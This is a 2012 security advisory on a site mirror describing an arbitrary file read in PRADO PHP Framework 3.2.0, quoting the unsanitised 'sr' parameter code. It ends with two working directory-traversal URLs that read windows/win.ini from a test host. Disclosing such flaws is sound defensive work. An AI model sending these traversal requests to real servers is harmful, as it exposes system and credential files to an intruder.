Bug: PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability ( Ascii Version )

Search:
WLB2

PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability

Published
Credit
Risk
2012.11.26
Gjoko 'LiquidWorm' Krstic
High
CWE
CVE
Local
Remote
N/A
N/A ( Add )
No
Yes

PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability


Vendor: Prado Software
Product web page: http://www.pradosoft.com
Affected version: 3.2.0 (r3169)

Summary: PRADO is a component-based and event-driven programming
framework for developing Web applications in PHP 5. PRADO stands
for PHP Rapid Application Development Object-oriented.

Desc: Input passed to the 'sr' parameter in 'functional_tests.php'
is not properly sanitised before being used to get the contents of
a resource. This can be exploited to read arbitrary data from local
resources with directory traversal attack.


---------------------------------------------------------------------------------------
/tests/test_tools/functional_tests.php:
---------------------------------------

3: $TEST_TOOLS = dirname(__FILE__);
4:
5: if(isset($_GET['sr']))
6: {
7:
8: if(($selenium_resource=realpath($TEST_TOOLS.'/selenium/'.$_GET['sr']))!==false)
9: echo file_get_contents($selenium_resource);
10: exit;
11: }

---------------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2012-5113
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5113.php



25.11.2012

--

http://172.162.133.7/tests/test_tools/functional_tests.php?sr=../../../../../../windows/win.ini
http://172.162.133.7/demos/time-tracker/tests/functional.php?sr=../../../../../../windows/win.ini

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5113.php
http://www.pradosoft.com

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version